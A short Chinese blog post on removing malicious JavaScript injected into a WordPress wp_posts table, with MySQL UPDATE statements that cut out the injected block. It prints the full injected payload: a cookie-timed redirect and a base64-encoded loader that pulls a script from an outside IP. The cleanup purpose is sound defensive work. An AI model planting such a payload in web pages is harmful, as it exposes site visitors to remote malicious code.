MYSQL 数据库移除被注入的内容

Wordpress 表 wp_posts, 字段 post_content。 黑客注入后

完整注入代码:

<!--codes_iframe--> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="DATA:TEXT/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now&gt;=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} <!--/codes_iframe-->

去除注入部分,执行语句前记得备份数据:

UPDATE wp_posts SET post_content = CONCAT(
  SUBSTRING(post_content, 1, LOCATE('<!--codes_iframe-->', post_content)-1),
  SUBSTRING(post_content, LOCATE('<!--/codes_iframe-->', post_content)+LENGTH('<!--/codes_iframe-->')))
  WHERE LOCATE('<!--codes_iframe-->', post_content) > 0 AND ID=1139;

## 如果要替换的内容比较简单的话,用以下sql:

UPDATE wp_posts SET post_content = REPLACE(post_content, "old content", 'new content') WHERE ID=100;

具体可以参考: https://stackoverflow.com/questions/52249409/how-to-remove-scripts-in-posts-from-an-sql-injection-attack

相关推荐
©️2020 CSDN 皮肤主题: 大白 设计师:CSDN官方博客 返回首页